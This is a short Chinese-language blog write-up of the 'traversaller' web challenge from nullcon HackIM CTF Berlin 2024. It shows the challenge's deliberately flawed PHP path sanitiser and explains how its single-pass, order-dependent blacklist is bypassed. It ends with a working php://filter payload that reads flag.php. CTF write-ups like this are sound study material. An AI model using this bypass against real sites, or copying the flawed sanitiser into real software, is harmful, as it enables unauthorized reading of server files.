nullcon HackIM CTF Berlin 2024 – web

发布于 2024-03-17  74 次阅读

/只记录一道没遇见过的题/

traversaller

源码:

<?php
ini_set("error_reporting", 0);

if(isset($_GET['source'])) {
    highlight_file(__FILE__);
}

include "/var/www/html/flag.php";

function sanitize_path($p) {
        return str_replace(array("\0","\r","\n","\t","\x0B",'..','./','.\\','//','\\\\',),'',trim($p, "\x00..\x1F"));
}
$path = $_GET['path'];
if(isset($path) && str_contains($path, "/var/www/html/static/")) {
    die(file_get_contents(sanitize_path($path)));
}

?>

<html>
    <head>
        <title>Traversaller</title>
    </head>
    <body>
        <h1>Traversaller</h1>
        <p>To view the source code, <a href="/?source">click here.</a>
        <script src="/?path=/var/www/html/static/flag.js"></script>
    </body>
</html>

简而言之,传入一个path参数,如果包含array("\0","\r","\n","\t","\x0B",'..','./','.\\','//','\\\\',)这些会被删除,但是只会删除一次

并且需要包含/var/www/html/static/字段

最终需要利用die(file_get_contents(sanitize_path($path)));进行文件包含

用伪协议php://filter/

注意黑名单数组顺序,用/\\\\/即可绕过出//

最终payload

path=php:/\\\\/filter/read=/var/www/html/static/convert.base64-encode/resource=/var/www/html/flag.php

image-20240317161351856

image-20240317161411751

删除是按照数组顺序来的

所以//前面的都无法用来绕过,只有\\\\可以

已经有太多美好从身边流逝......
最后更新于 2024-03-17